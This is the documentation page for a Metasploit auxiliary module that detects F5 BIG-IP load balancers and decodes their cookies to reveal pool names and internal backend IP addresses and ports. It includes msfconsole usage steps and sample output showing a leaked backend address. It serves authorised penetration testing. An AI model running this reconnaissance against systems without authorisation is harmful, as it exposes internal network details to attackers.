CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md
Views: 11784

Vulnerable Application

This module identifies F5 BIG-IP load balancers and leaks backend information (pool name, routed domain, and backend servers' IP addresses and ports) through cookies inserted by the BIG-IP systems.

Verification Steps

  1. Start msfconsole

  2. Do: use auxiliary/gather/f5_bigip_cookie_disclosure

  3. Do: set RHOSTS www.example.com

  4. Do: run

Options

REQUESTS

The number of requests to send. Default value is 10.

Scenarios

msf5 > use auxiliary/gather/f5_bigip_cookie_disclosure msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS www.example.com RHOSTS => www.example.com msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > run [*] Running module against 93.184.216.34 [*] Starting request / [-] F5 BIG-IP load balancing cookie not found [*] Auxiliary module execution completed msf5 auxiliary(gather/f5_bigip_cookie_disclosure) >
msf5 > use auxiliary/gather/f5_bigip_cookie_disclosure msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS vulnerable-target.com RHOSTS => vulnerable-target.com msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > run [*] Running module against 1.1.1.1 [*] Starting request / [+] F5 BIG-IP load balancing cookie "BIGipServer~DMZ~EXAMPLE~vulnarable-target-443_pool = 1214841098.47873.0000" found [+] Load balancing pool name "~DMZ~EXAMPLE~vulnarable-target-443_pool" found [+] Backend 10.1.105.72:443 found [*] Auxiliary module execution completed msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > notes Notes ===== Time Host Service Port Protocol Type Data ---- ---- ------- ---- -------- ---- ---- 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_cookie_name "BIGipServer~DMZ~EXAMPLE~vulnarable-target-443_pool" 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_pool_name "~DMZ~EXAMPLE~vulnarable-target-443_pool" 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_backends [{:host=>"10.1.105.72", :port=>443}] msf5 auxiliary(gather/f5_bigip_cookie_disclosure) >